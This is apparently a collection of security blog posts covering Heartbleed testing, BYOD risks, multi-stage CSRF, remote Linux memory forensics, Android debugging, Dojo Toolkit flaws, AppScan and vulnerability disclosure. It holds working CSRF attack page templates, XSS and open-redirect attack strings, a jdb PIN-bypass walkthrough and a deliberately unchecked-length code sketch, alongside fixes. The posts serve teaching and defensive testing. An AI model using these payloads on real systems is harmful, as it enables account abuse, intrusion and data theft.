TLS/DTLS leverage “heartbeat”, or “keep alive”, messages once a session is established to let hosts know that a connection is still needed and active. Here is an example of a normal heartbeat that occurs after the initial SSL connection has already taken place.



OpenSSL implemented this heartbeat in a way that allowed the client to tell the server how much data it wanted echoed back, without checking that length against the payload that was actually sent. A client can request up to 64KB of memory per heartbeat, and that memory can contain anything processed by the service, including usernames, passwords, and private keys.
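
To make the flaw concrete, here is a rough sketch of the broken pattern. The real bug lives in OpenSSL's C code, so treat this Java fragment purely as an illustration of the missing bounds check, not as the actual implementation:

 // Hypothetical illustration only - this is NOT OpenSSL source, just the shape of the flaw.
 class HeartbeatSketch {
     static byte[] buildHeartbeatResponse(byte[] processMemory, int payloadOffset, int claimedLength) {
         // Vulnerable: the attacker-supplied claimedLength is trusted, so up to ~64KB of
         // memory adjacent to the real payload gets copied and echoed back to the client.
         byte[] response = new byte[claimedLength];
         System.arraycopy(processMemory, payloadOffset, response, 0, claimedLength);
         return response;
         // The fix (1.0.1g) is to discard the request when claimedLength exceeds
         // the length of the payload that actually arrived.
     }
 }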



Affected Versions and Recommendations

OpenSSL versions 1.0.1 through 1.0.1f are vulnerable and the fix was implemented in version 1.0.1g. The blanket recommendation is to apply the patch and change passwords. It is important as a user to ensure whatever application you are using has already implemented the patch before changing your passwords; otherwise your new password may still be susceptible to attack.

Prior Detection

How do you tell if someone has used the attack against you in the past? Well, that’s the tricky part - this bug was unknown for a long time, so prior to its disclosure no sensors or products would detect it occurring. If you maintain network captures for your network, you may be able to query that data and look for a signature, but there is nothing left on the server side that would indicate it was being exploited.

Now that the attack has been publicly disclosed, there is a multitude of detection mechanisms in place to alert administrators of a Heartbleed attack (including Snort, Tripwire, and honeypot scripts).

Testing

There are a ton of ways to test for Heartbleed - McAfee has released a Heartbleed Checker tool, there is a Metasploit module, and there is even an Nmap NSE script. We'll cover the Nmap script here.

Using NMAP

Checking for Heartbleed with Nmap is a painless process. First, download the ssl-heartbleed.nse script and place it in the default NSE scripts folder (/usr/share/nmap/scripts).



Next download the TLS library to the nselib folder:



Now make sure Nmap has updated its script DB:

 root@kali:~# nmap --script-updatedb




And you're ready to roll! To test a specific URL you can run:

 root@kali:~# nmap -vv -p 443 --script ssl-heartbleed www.somesite.com -oN somesite_outputfile



To test a range of hosts you can use:

 root@kali:~# nmap -vv -p 443 --script ssl-heartbleed 192.168.1.0/24 -oN subnet_outputfile



And to test multiple ports, just run:

 root@kali:~# nmap -sV -p 443,8443,6443 --script=ssl-heartbleed.nse 192.168.1.1



Recap of BYOD Risks

By Kunal Garg.

Bring Your Own Device (BYOD) has been a hot topic over the last two years as organizations begin to permit employees to bring personally owned mobile devices (such as laptops, tablets, and smart phones) to their workplace, and let them use those devices to access the corporate network and sensitive information on it.

Businesses usually gain some advantage from this program, as the cost of acquiring the device is already borne by the user/employee, which may save companies a lot of money. Other benefits are increased productivity and the ability to work remotely.

Risks and vulnerabilities also increase when end-user devices come into the picture on an already hardened and secure network. A company has control over its corporate-owned devices and has the necessary security mechanisms in place; implementing security technologies and defining an acceptable use policy for user-owned devices is not as easy a task. It is pretty hard for the “IT guy” to tell end users what to do and what not to do on their swanky phones, tablets, and laptops.

Some of the common risks associated with BYOD program:

  1. Jailbreaking/Rooting - Many users jailbreak/root their phones to gain admin privileges and rights on the device. Custom jailbreak apps are simply install-and-run, so it is fairly easy for a novice user to root the device. This process, however, defeats the built-in security mechanisms of the device and widens the attack surface.
  2. Mobile Accessibility - Mobile devices can move far beyond the boundaries of the corporate network. Open wireless networks available in coffee shops, airports, etc. give an attacker the opportunity to communicate directly with the corporate-owned asset, perform a man-in-the-middle attack, and sniff the network traffic for sensitive data.
  3. Personal/Corporate Separation - A personal device is used for far different purposes, and far more often, than a corporate device. This places security decisions in the hands of the user more than ever. A malicious application may have far greater consequences when installed on a corporate device. For instance, granting excessive permissions to a mobile application may seem harmless to a user but may result in data leakage.
  4. Lost or stolen devices - Lost or stolen devices pose a serious security risk, as a lot of sensitive information is on the device. Devices should support remote wipe.
  5. Employee Resignation/Termination - If the employee is let go, or leaves the company, recovering and deleting company data can be a problem. There should be a policy in place that governs how that data will be retrieved from the personal laptop and/or smartphone.
  6. Device Sharing - Mobile devices are more likely to be occasionally shared, potentially putting corporate data at risk. A person with malicious intent could read sensitive information in enterprise applications. Re-authentication upon each access and two-factor authentication should be implemented.


What risks do you see around BYOD? Let us know in the comments below!



Multi-Staged/Multi-Form CSRF

By Deepak Choudhary.

Exploiting a CSRF vulnerability that relies on a single request (GET/POST) is often a simple task, and tools like Burp make the effort even easier. However, exploitation can become much more difficult when multiple requests are needed to exploit a CSRF vulnerability.

This is common with edit, add, and delete actions on a web page where a user has to confirm a change (e.g. "Are you sure you'd like to...?").



Multi-staged requests add a level of complexity since they can be GET requests, POST requests, or a combination of both. This makes them slightly more complicated to exploit in a single click.

The following are a few multi-staged CSRF templates that you can use to aid in exploitation.

GET-GET Requests

<html>
<head>
<script language="JavaScript">
function abc()
{
window.open("https://www.example.com/first.aspx");
window.setTimeout( function () { document.forms[0].submit()}, 12000);
}
</script>
</head>
<body onload="abc();">
<form action="https://www.example.com/second.aspx" method="GET">
<input type="submit" value="Submit request" />
</form>
</body>
</html>



POST-POST Requests

<html>
<body>
<form id="form1" method="POST" target="_blank" action=" https://www.example.com/first.aspx">
<input type="hidden" name="test1" value="1">
<input type="submit" value="form1">
</form>

<form id="form2" method="POST" target="_blank" action=" https://www.example.com/second.aspx">
<input type="hidden" name="test2" value="2">
<input type="submit" value="form2">
</form>

<script>
document.getElementById("form1").submit();
window.setTimeout( function () { document.forms.form2.submit()}, 12000);
</script>
</body>
</html>



GET-POST Requests

<html>
<head>
<script language="JavaScript">
function abc()
{
window.open("https://www.example.com/first.aspx");
window.setTimeout( function () { document.forms[0].submit()}, 12000);
}
</script>
</head>
<body onload="abc();">

<form action=" https://www.example.com/second.aspx" method="POST">
<input type="hidden" name="parameter1 name " value="test1" />
<input type="hidden" name="parameter2 name" value="test2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>



Fixing CSRF: Of course, CSRF token validation is what saves you here. A random token (ideally per request) should be present in every form and validated on the server side.
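
As a rough sketch of server-side token validation (a Java servlet filter with illustrative names, not taken from any particular framework): a random token is stored in the session, embedded in each form, and every state-changing request is rejected unless it echoes that token back.

 import java.io.IOException;
 import javax.servlet.*;
 import javax.servlet.http.*;

 public class CsrfTokenFilter implements Filter {
     public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
             throws IOException, ServletException {
         HttpServletRequest request = (HttpServletRequest) req;
         HttpServletResponse response = (HttpServletResponse) res;

         // Only state-changing requests need the check; the token itself is issued
         // elsewhere (e.g. when the form page is rendered) and stored in the session.
         if ("POST".equalsIgnoreCase(request.getMethod())) {
             String sessionToken = (String) request.getSession().getAttribute("csrfToken");
             String submittedToken = request.getParameter("csrfToken");
             if (sessionToken == null || !sessionToken.equals(submittedToken)) {
                 response.sendError(HttpServletResponse.SC_FORBIDDEN, "Invalid CSRF token");
                 return;
             }
         }
         chain.doFilter(req, res);
     }

     public void init(FilterConfig config) {}
     public void destroy() {}
 }

Because the attacker's page cannot read the victim's token, each stage of the multi-form templates above would fail this check.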


Acquiring Linux Memory from a Server Far Far Away

By Dan Caban.

In the past it was possible to acquire memory from Linux systems by directly imaging (with dd) pseudo-device files such as /dev/mem and /dev/kmem. In later kernels, this access was restricted and/or removed. To provide investigators and system administrators unrestricted access, loadable kernel modules were developed and made available in projects such as fmem and LiME (Linux Memory Extractor).

In this blog post I will introduce you to a scenario where LiME is used to acquire memory from a CentOS 6.5 x64 system that is physically hosted in another continent.

LiME is a Loadable Kernel Module (LKM). LKMs are typically designed to extend kernel functionality and can be inserted by a user with root privileges. This sounds a little scary, and it does introduce tangible risks if done wrong. But on the positive side:

  • the LiME compiled LKM is rather small
  • the process does not require a restart
  • the LKM can be added/removed quickly
  • the resulting memory dump can be transferred over the network without writing to the local disk; and
  • the memory dump is compatible with Volatility


Getting LiME

Since LiME is distributed as source without any binaries you need to compile it yourself. You will find documentation on the internet suggesting that you jump right in and compile LiME on your target system. I recommend you first see if a pre-compiled LKM exists, or alternatively compile and test in a virtual machine first.

In either case, you first need to determine the kernel running on your target system, as the LKM you use must have been compiled on the exact same operating system, kernel version, and architecture. Here we determine our target is running the kernel 2.6.32-431.5.1.el6.x86_64.

[centos@targetsystem ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.5.1.el6.x86_64 #1 SMP Wed Feb 12 00:41:43 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux



One great, reputable resource for pre-compiled LiME LKMs is the Linux Forensics Tools Repository at cert.org. They provide an RPM repository of forensic tools for Red Hat Enterprise Linux, CentOS, and Fedora.

To check whether a module for your specific kernel has been compiled for your operating system, visit CERT and find the “repoview” for your target operating system.



Browse to “applications/forensics tools” and view the documentation on “lime-kernel-objects”.

As of today's date the following kernels have pre-compiled LiME LKMs for CentOS 6 / RHEL 6:

2.6.32-71
2.6.32-71.14.1
2.6.32-71.18.1
2.6.32-71.24.1
2.6.32-71.29.1
2.6.32-71.7.1
2.6.32-131.0.15
2.6.32-220
2.6.32-279
2.6.32-358.0.1
2.6.32-358.11.1
2.6.32-358.14.1
2.6.32-358.18.1
2.6.32-358.2.1
2.6.32-358.23.2
2.6.32-358.6.1
2.6.32-431
2.6.32-431.1.2.0.1
2.6.32-431.3.1



Oh no! The kind folks at Cert are not completely up to date, and my target system is running a newer kernel. That means I have to do the heavy lifting myself.

I installed CentOS 6.5 x64 in a virtual machine and updated until I had the latest kernel matching 2.6.32-431.5.1.el6.x86_64.

[root@vmtest ~]$ yum update
[root@vmtest ~]$ yum upgrade



Since this was a kernel upgrade, I gave my virtual machine a reboot.

[root@vmtest ~]$ shutdown -r now



We now have the matching kernel, but we still need the associated kernel headers and source as well as the tools needed for compiling.

[root@vmtest ~]$ yum install gcc gcc-c++ kernel-headers kernel-source




Now we are finally ready to download and compile our LiME LKM!

[root@vmtest ~]# mkdir lime; cd lime
[root@vmtest lime]# wget https://lime-forensics.googlecode.com/files/lime-forensics-1.1-r17.tar.gz
[root@vmtest lime]# tar -xzvf lime-forensics-1.1-r17.tar.gz
[root@vmtest lime]# cd src
[root@vmtest src]# make
….
make -C /lib/modules/2.6.32-431.5.1.el6.x86_64/build M=/root/lime/src modules

[root@vmtest src]# ls lime*.ko
lime-2.6.32-431.5.1.el6.x86_64.ko



Conducting a test run

We can now test out our newly built LiME LKM on our virtual machine by loading the kernel module and dumping memory to a local file.

We are opting to create our memory image on the local file system, so I provide the argument path=/root/mem.img. LiME supports raw, padded, and “lime” formats. Since Volatility supports the lime format, I have provided the argument format=lime.

[root@vmtest ~]# insmod lime-2.6.32-431.5.1.el6.x86_64.ko "path=/root/mem.img format=lime"



I have validated that the memory image matches the amount of RAM I allocated to the virtual machine (1GB) and that it contains valid content.

[root@vmtest ~]# ls -lah /root/mem.img 
-r--r--r--. 1 root root 1.0G Mar 9 08:11 /root/mem.img
[root@vmtest ~]# strings /root/mem.img | head -n 3
EMiL
root (hd0,0)
kernel /vmlinuz-2.6.32-431.5.1.el6.x86_64 ro root=/dev/mapper/vg_livecd-lv_root rd_NO_LUKS



I can now remove the kernel module with one simple command:

[root@vmtest ~]# rmmod lime



Acquiring memory over the internet

Now we return to our scenario where we are trying to capture memory from a CentOS server on another continent. I opted to upload LiME LKM to a server I control and then download it via HTTP.

[root@targetserver ~]# wget http://my.server-on-the-internet.com/lime-2.6.32-431.5.1.el6.x86_64.ko




The great thing about LiME is that it is not limited to writing its output to a local disk or file. In our test run we supplied an output path with the argument path=/root/mem.img. We will instead create a TCP service using the argument path=tcp:4444.

[root@targetserver ~]# insmod lime-2.6.32-431.5.1.el6.x86_64.ko "path=tcp:4444 format=lime"




If I were situated within our client's network, or if port 4444 were open to the internet, I could simply use netcat to connect and transfer the memory image to my investigative laptop.

[dan@investigativelaptop ~]# nc target.server.com 4444 > /home/dan/evidence/evidence.lime.img




Since in this scenario our server is on the internet and a restrictive firewall is inline, we are forced to get creative.

Remember how I downloaded the LiME LKM to the target server via HTTP (port 80)? That means the server can make outbound TCP connections via that port.

I set up a netcat listener on my investigative laptop here in our lab and opened it up to the internet. I did this by configuring my firewall to pass traffic on this port to my local LAN address; you can achieve the same result with most home/small office routers using port forwarding.

Step 1: Set up a netcat listener at our lab on port 80.

[dan@investigativelaptop ~]# nc -l 80 > /home/dan/evidence/evidence.lime.img



Step 2: Run LiME LKM and configure it to wait for TCP connections on port 4444.

[root@targetserver ~]# insmod lime-2.6.32-431.5.1.el6.x86_64.ko "path=tcp:4444 format=lime"



On the target server I can now use a local netcat connection that is piped to a remote connection in our lab via port 80 (where 60.70.80.90 is our imaginary lab IP address.)

Step 3: In another shell initiate the netcat chain to transfer the memory image to my investigative laptop at our lab.

[root@targetserver ~]# nc localhost 4444 | nc 60.70.80.90 80




Voila! I now have a memory image on my investigative laptop and can start my analysis.

Below is a basic visualization of the process:



Memory Analysis with Volatility

Volatility ships with many prebuilt profiles for parsing memory dumps, but they focus exclusively on the Windows operating system. To perform memory analysis on a sample collected from Linux, we first need to create a profile that matches the exact operating system, kernel version, and architecture (surprise, surprise!). So let’s head back to our virtual machine, where we will collect the information required to create a Linux profile:

  • the debug symbols (System.map*);
    • Requirements: access to the test virtual machine system running on the same operating system, kernel version and architecture
  • and information about the kernel’s data structures (vtypes).
    • Requirements: Volatility source and the necessary tools to compile vtypes running on the same operating system, kernel version and architecture.


First let’s create a folder for collection of required files.

cd ~
mkdir -p volatility-profile/boot/
mkdir -p volatility-profile/volatility/tools/linux/



Now let’s collect the debug symbols. On a CentOS system they are located in the /boot/ directory. We need to find the System.map* file that matches the kernel version that was active when we collected the system memory (2.6.32-431.5.1.el6.x86_64).

[root@vmtest ~]# cd /boot/
[root@vmtest boot]# ls -lah System.map*
-rw-r--r--. 1 root root 2.5M Feb 11 20:07 System.map-2.6.32-431.5.1.el6.x86_64
-rw-r--r--. 1 root root 2.5M Nov 21 22:40 System.map-2.6.32-431.el6.x86_64



Copy the appropriate System.map file to the collection folder.

[root@vmtest boot]# cp System.map-2.6.32-431.5.1.el6.x86_64 ~/volatility-profile/boot/



One of the requirements to compile the vtypes is libdwarf. While this may be easily installed on some operating systems using apt-get or yum, CentOS 6.5 requires that we borrow and compile the source from the Fedora Project. The remaining prerequisites for compiling should have been installed when we compiled LiME earlier in the section Getting LiME.

[root@vmtest boot]# cd ~
[root@vmtest ~]# mkdir libdwarf
[root@vmtest ~]# cd libdwarf/
[root@vmtest libdwarf]# wget http://pkgs.fedoraproject.org/repo/pkgs/libdwarf/libdwarf-20140208.tar.gz/4dc74e08a82fa1d3cab6ca6b9610761e/libdwarf-20140208.tar.gz
[root@vmtest libdwarf]# tar -xzvf libdwarf-20140208.tar.gz
[root@vmtest libdwarf]# cd dwarf-20140208/
[root@vmtest dwarf-20140208]# ./configure
[root@vmtest dwarf-20140208]# make
[root@vmtest dwarf-20140208]# cd dwarfdump
[root@vmtest dwarfdump]# make install




Now we can obtain a copy of the Volatility source code and compile the vtypes.

[root@vmtest dwarfdump]# cd ~
[root@vmtest ~]# mkdir volatility
[root@vmtest ~]# cd volatility
[root@vmtest volatility]# wget https://volatility.googlecode.com/files/volatility-2.3.1.tar.gz
[root@vmtest volatility]# tar -xzvf volatility-2.3.1.tar.gz
[root@vmtest volatility]# cd volatility-2.3.1/tools/linux/
[root@vmtest linux]# make



After successfully compiling the vtypes, we will copy the resulting module.dwarf back out to the collection folder.

[root@vmtest linux]# cp module.dwarf ~/volatility-profile/volatility/tools/linux/



Now that we have collected the two requirements to create a system profile, let’s package them into a ZIP file, as Volatility requires.

[root@vmtest linux]# cd ~/volatility-profile/
[root@vmtest volatility-profile]# zip CentOS-6.5-2.6.32-431.5.1.el6.x86_64.zip boot/System.map-2.6.32-431.5.1.el6.x86_64 volatility/tools/linux/module.dwarf
adding: boot/System.map-2.6.32-431.5.1.el6.x86_64 (deflated 80%)
adding: volatility/tools/linux/module.dwarf (deflated 90%)




On my investigative laptop I could drop this ZIP file in the default volatility profile directory, but I would rather avoid losing it in the future due to upgrades/updates. I instead will create a folder to manage my custom profiles and reference it when running volatility.

[dan@investigativelaptop evidence]# mkdir -p ~/.volatility/profiles/
[dan@investigativelaptop evidence]# cp CentOS-6.5-2.6.32-431.5.1.el6.x86_64.zip ~/.volatility/profiles/



Now I can confirm that Volatility recognizes the new profile by providing the plugin directory:

[dan@investigativelaptop evidence]# vol.py --plugins=/home/dan/.volatility/profiles/ --info | grep -i profile | grep -i linux
Volatility Foundation Volatility Framework 2.3.1
LinuxCentOS-6_5-2_6_32-431_5_1_el6_x86_64x64 - A Profile for Linux CentOS-6.5-2.6.32-431.5.1.el6.x86_64 x64



Now I can start running the linux_ prefixed plugins that come shipped with Volatility to conduct memory analysis.

[dan@investigativelaptop evidence]# vol.py --plugins=/home/dan/.volatility/profiles/ --profile=LinuxCentOS-6_5-2_6_32-431_5_1_el6_x86_64x64 linux_cpuinfo -f /home/dan/evidence/evidence.lime.img
Volatility Foundation Volatility Framework 2.3.1
Processor Vendor Model
------------ ---------------- -----
0 GenuineIntel Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
1 GenuineIntel Intel(R) Xeon(R) CPU X5560 @ 2.80GHz





About the Author

Dan Caban (EnCE, CCE, ACE) works as a Principal Consultant at McAfee Foundstone Services EMEA based out of Dubai, United Arab Emirates.




Debugging Android Applications

By Naveen Rudrappa.

Using a debugger to manipulate application variables at runtime can be a powerful technique to employ while penetration testing Android applications. Android applications can be unpacked, modified, re-assembled, and converted to gain access to the underlying application code; however, understanding which variables are important and should be modified is a whole other story that can be laborious and time consuming. In this blog post we'll highlight the benefits of runtime debugging and give you a simple example to get you going!

Debugging is a technique where a hook is attached to a particular piece of application code. Execution pauses once that code is reached, giving us the ability to analyze local variables, dump class values, modify values, and generally interact with the program state. Then, when we're ready, we can resume execution.

Required Tools

If you have done any work with Android applications, you shouldn't need any new tools:

  1. The application's installation package
  2. Java SDK
  3. Android SDK

Reverse engineering plays a prominent role in Android penetration testing and pairs naturally with runtime debugging: decompiled code helps you understand which functions and variables matter before you attach a debugger.

Debuggable

The AndroidManifest.xml contained within the application's .apk has an android:debuggable setting which controls whether the application can be debugged. So we'll need to use the APK Manager to decompress the installation package and add android:debuggable="true".
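
For reference, the edit typically looks like this in the decompiled AndroidManifest.xml (the package name here is just a placeholder):

 <manifest xmlns:android="http://schemas.android.com/apk/res/android"
           package="com.example.targetapp">
     <!-- Added so a debugger can attach to the app at runtime -->
     <application android:debuggable="true">
         ...
     </application>
 </manifest>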



Attaching

We'll need to attach the debugger to our application in order to debug it. Using adb jdwp, we can list the process IDs of all running debuggable applications; as long as the target application was the last one launched, we can reasonably guess that the last process ID on the list is ours.



Next we'll need to forward our debugging session to a port we can connect to with our debugger:

 adb forward tcp:8000 jdwp:498 


Finally we can attach the debugger with:

 jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8000 


With the debugger attached, we can set breakpoints at the required functions and analyze the application's behavior at runtime. To identify function names, you can decompile the application's dex code and use it to guide your debugging session.

Some of the useful JDB commands for debugging:

  1. stop in [function name] - Set a breakpoint
  2. next - Executes one line
  3. step - Step into a function
  4. step up - Step out of a function
  5. print obj - Prints a class name
  6. dump obj - Dumps a class
  7. print [variable name] - Print the value of a variable
  8. set [variable name] = [value] - Change the value of a variable

An Exercise for You!



This application is a pretty simple one. Upon entering the correct PIN, which is 1234, the application responds with the message “correct PIN entered”. Upon entering any value other than 1234, the application responds with the message “Invalid PIN”. Bypass this logic via debugging so that for any invalid PIN the application responds with “correct PIN entered”. For the solution, refer to the image below; it summarizes all the commands needed to complete the challenge.
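
If it helps to visualize the target, the PIN check inside such an app usually boils down to something like the hypothetical method below (names invented for illustration); the jdb commands in the comments show one way the challenge can be approached:

 // Hypothetical target code - names are invented for illustration.
 public class PinChecker {
     public boolean checkPin(String entered) {
         boolean valid = "1234".equals(entered);
         return valid;
     }
 }

 // Example jdb session (after attaching as shown above):
 //   stop in com.example.pinapp.PinChecker.checkPin    <- break when the check runs
 //   next                                              <- execute the comparison line
 //   print valid                                       <- shows "valid = false" for a bad PIN
 //   set valid = true                                  <- flip the result
 //   cont                                              <- resume; the app reports "correct PIN entered"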



Dojo Toolkit and Risks with Third Party Libraries

By Deepak Choudhary.

Third-party libraries can become critical components of in-house developed applications; while the benefits of using them are huge, there are also risks to consider. In this blog post we'll look at a common third-party component of many web applications, Dojo Toolkit. After noticing it was included during a recent web application penetration test, it became clear that the version incorporated within the application was vulnerable and ultimately exposed the entire application to attack.

Dojo Toolkit

If you haven't encountered Dojo before, just know that it is a JavaScript/AJAX library used to build cross-platform web and mobile applications. The framework provides various "widgets" that can be used to support a variety of browsers, everything from Safari to Chrome on iPhone to BlackBerry.

Documented Vulnerabilities

Dojo has reported some serious security issues in the past, such as XSS, DOM-based XSS, and URL redirection, so it's important to stay up to date with the latest version if you leverage it within your application.

Vulnerable version: Dojo 0.4 through Dojo 1.4
Latest Version: Dojo 1.9.3
Reference: http://dojotoolkit.org/ , http://dojotoolkit.org/features/mobile

Files with known vulnerabilities

  • dojo/resources/iframe_history.html
  • dojox/av/FLAudio.js
  • dojox/av/FLVideo.js
  • dojox/av/resources/audio.swf
  • dojox/av/resources/video.swf
  • util/buildscripts/jslib/build.js
  • util/buildscripts/jslib/buildUtil.js
  • util/doh/runner.html
  • /dijit/tests/form/test_Button.html


Prior attack strings

  • http://WebApp/dojo/iframe_history.html?location=http://www.google.com
  • http://WebApp/dojo/iframe_history.html?location=javascript:alert%20%289999%2
  • http://WebApp/util/doh/runner.html?dojoUrl='/>foo</script><'"<script>alert(/xss/)</script>
  • http://WebApp/util/doh/runner.html?testUrL='/>foo</script><'"<script>alert(/xss/)</script>
  • http://WebApp/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script>
  • dojox/av/FLAudio.js (allowScriptAccess:"always")
  • dojox/av/FLVideo.js (allowScriptAccess:"always"), etc.


If you use Dojo, make sure you have an updated version installed or remove these files (if not needed) from the application's directories.

Privilege escalation with AppScan

By Kunal Garg.

Web application vulnerability scanners are a necessary evil when it comes to achieving a rough baseline or some minimum level of security. While they should never be used as the only testament of an application's security, they do provide a level of assurance above no security testing at all. For the security professional, they serve as another tool in the toolbox. All web application scanners are different, and some require finer tuning than others. A common question with IBM's AppScan is, "How do you configure it to test only for privilege escalation issues?" In this post, we'll walk you through the steps!

Privilege escalation testing comes in handy during authorization testing, when you're trying to tell whether one user is authorized to access data or perform actions outside of their role.

Prerequisite

Your first step is to run a post-authentication scan with a higher-privilege user. In this example, we'll use "FSTESTADMIN". Ideally you'll use a manual crawl so that the maximum number of URLs is covered.

Configuration

Once the post-authentication scan is complete, configure AppScan as follows:

  1. Open a new scan and go to "Scan Configuration"
  2. Go to Login Management and record the login with the lower-privilege user (say, "FSTESTUSER")
  3. Go to "Test" then "Privilege Escalation" and browse to the scan file created previously (the scan file for "FSTESTADMIN")



  4. Go to Test Policy, select all tests (Ctrl+A), and uncheck them
  5. In the find section, type “escalation” and select all the privilege escalation checks



Once all the above settings are complete, run the scan; AppScan will only run tests for privilege escalation.

This usually creates lots of false positives, as AppScan requests the URLs from the higher-privilege scan using the credentials of the lower-privilege user. Any URLs/pages that are common to both users will be reported as an issue (a false positive in this case).

Approaches to Vulnerability Disclosure

By Brad Antoniewicz.



The excitement of finding a vulnerability in a piece of commercial software can quickly shift to fear and regret when you disclose it to the vendor and find yourself in a conversation with a lawyer questioning your intentions. This is an unfortunate reality in our line of work, but you can take actions to protect your butt. In this post, we’ll take a look at how vulnerability disclosure is handled in standards, by bug hunters, and by large organizations so that you can figure out how to make the best decision for you.

Disclosure Standpoints

While it’s debatable, I think hacking, and more specifically vulnerability discovery, started as a way to better the overall community - e.g. we can make the world a better, more secure place by finding and fixing vulnerabilities within the software we use. Telling software maintainers about vulnerabilities we find in their products falls right in line with this idea. However, there is also something else to consider: recognition and sharing. If you spend weeks finding an awesome vulnerability, you should be publicly recognized for that effort, and moreover, others should also know about your vulnerability so they can learn from it.

Unfortunately, vendors often lack the same altruistic outlook. From a vendor’s perspective, a publicly disclosed vulnerability highlights a flaw in their product, which may negatively impact its customer base. Some vendors even interpret vulnerability discovery as a direct attack against their product or their company. I’ve personally had lawyers ask me “Why are you hacking our company?” when I disclosed a vulnerability in their offline desktop application.

As time progressed, vulnerability discovery shifted from a hobby and “betterment” activity to a profitable business. There are plenty of organizations out there selling exploits for undisclosed vulnerabilities, plus a seemingly even greater number of criminal or state-sponsored organizations leveraging undisclosed vulnerabilities for corporate espionage and nation-state attacks. This shift has turned computer hacking from a “hippy” activity into serious business.

The emergence of bug bounty programs has really helped steer bug hunters away from criminal outlets by offering monetary reward and public recognition. It has also demystified how disclosure is handled. However, not all vendors offer a bug bounty program, and many times lawyers may not even be aware of the bug bounty programs available in their own organization, which could put you in a sticky situation if you take the wrong approach to disclosure.

General Approaches

In general, there are three categories of disclosure:

  • Full disclosure - Full details are released publicly as soon as possible, often without vendor involvement
  • Coordinated disclosure - Researcher and vendor work together so that the bug is fixed before the vulnerability is disclosed
  • Private or non-disclosure - The vulnerability is released to a small group of people (not the vendor) or kept private


These categories broadly classify disclosure approaches, but many actual disclosure policies are unique in that they set time limitations on vendor response and similar conditions.

Established Disclosure Standards

To give better perspective, let's look at some existing standards that help guide you in the right direction.

  • Internet Engineering Task Force (IETF) – Responsible Vulnerability Disclosure Process - The Responsible Vulnerability Disclosure Process established by this IETF draft is one of the first efforts made to create a process that establishes roles for all parties involved. This process accurately defines the appropriate roles and steps of a disclosure; however it fails to address publication by the researcher if the vendor fails to respond or causes unreasonable delays. At most the process states that the vendor must provide specific reasons for not addressing a vulnerability within 30 days of initial notification.
  • Organization for Internet Safety (OIS) Guidelines for Security Vulnerability Reporting and Response - The OIS guidelines provide further clarification of the disclosure process, offering more detail and establishing terminology for common elements of a disclosure such as the initial vulnerability report (Vulnerability Summary Report), request for confirmation (Request for Confirmation Receipt), and status request (Request for Status). As with the Responsible Vulnerability Disclosure Process, the OIS Guidelines do not define a hard time frame for when the researcher may publicize details of the vulnerability. If the process fails, the OIS Guidelines define a “Conflict Resolution” step which ultimately results in the ability for parties to exit the process; however, no disclosure option is provided. The OIS also introduces the scenario where an unrelated third party discloses the same vulnerability - at that time the researcher may disclose without the need for a vendor fix.
  • Microsoft Coordinated Vulnerability Disclosure (CVD) - Microsoft’s Coordinated Vulnerability Disclosure is similar to responsible disclosure in that its aim is to have both the vendor and the researcher (finder) work together to disclose information about the vulnerability at a time after a resolution is reached. However, CVD refrains from defining any specific time frames and only permits public disclosure after a vendor resolution or evidence of exploitation is identified.


Coordinator Policies

Coordinators act on behalf of a researcher to disclose vulnerabilities to vendors. They provide a level of protection to the researcher and also take on the role of finding an appropriate vendor contact. While a coordinator's goal is to notify the vendor, it also satisfies the researcher's aim of sharing the vulnerability with the community. This section gives an overview of coordinator policies.

  • Computer Emergency Response Team Coordination Center (CERT/CC) Vulnerability Disclosure Policy - The CERT/CC vulnerability disclosure policy sets a firm 45-day time frame from initial report to public disclosure. This occurs regardless of whether a patch or workaround has been released by the vendor. Exceptions to this policy do exist for critical issues in core components of technology that require a large effort to fix, such as vulnerabilities in standards or core components of an operating system.
  • Zero Day Initiative (ZDI) Disclosure Policy - ZDI is a coordinator that offers monetary rewards for vulnerabilities. It uses the submitted vulnerabilities to generate signatures so that its security products can offer clients early detection and prevention. After making a reasonable effort, ZDI may disclose vulnerabilities within 15 days of initial contact if the vendor does not respond.


Researcher Policies

Security companies commonly support vulnerability research and make their policies publicly available. This section provides an overview of a handful:

  • Rapid7 Vulnerability Disclosure Policy - Rapid7 attempts to contact the vendor via telephone and email; then, after 15 days, regardless of response, it will post its findings to CERT/CC. This combination gives the vendor a potential 60 days before public disclosure, because it is CERT/CC's policy to wait 45 days.
  • VUPEN Policy - VUPEN is a security research company that adheres to a “commercial responsible disclosure policy”, meaning any vendor who is under contract with VUPEN will be notified of vulnerabilities, however all other vulnerabilities are mostly kept private to fund the organization’s exploitation and intelligence services.
  • Trustwave/SpiderLabs Disclosure Policy - Trustwave makes a best effort approach to contacting the vendor then ultimately puts the decision of public disclosure in its management’s hands if the vendor is unresponsive.

Summary of Approaches

The following summarizes, policy by policy, the approaches mentioned above (notification addresses tried, and time frames for acknowledging receipt, status updates, verification/resolution, and disclosure):

  • Responsible Vulnerability Disclosure Process - Notification emails: security@, security-alert@, support@, secalert@, and other public info such as the domain registrar. Receipt: 7 days. Status updates: every 7 days or as otherwise agreed. Verification/resolution: vendors make a best effort to address the issue within 30 days, and can request an additional 30-day grace period and further extensions without defined limits. Disclosure: after resolution by the vendor.
  • OIS Guidelines for Security Vulnerability Reporting and Response - Notification emails: security@, secure@, security-alert@, secalert@ (alternates: abuse@, postmaster@, sales@, info@, support@), and other public info such as the domain registrar. Receipt: 7 days, after which the finder can send a request for receipt; after three more days, go to conflict resolution. Status updates: every 7 days or as otherwise agreed; the finder can send a request for status if the vendor does not comply, and after three days go to conflict resolution. Verification/resolution: 30 days from vendor receipt is suggested, although it should be defined on a case-by-case basis. Disclosure: after resolution by the vendor.
  • Microsoft Coordinated Vulnerability Disclosure - Notification emails: security@, secure@, security-alert@, secalert@, support@, psirt@, info@, sales@, plus search engine results, etc. Receipt, status update, and resolution time frames: not defined. Disclosure: after resolution by the vendor.
  • CERT/CC Vulnerability Disclosure Process - Notification emails: not published. Receipt, status update, and resolution time frames: not defined. Disclosure: 45 days from initial notification.
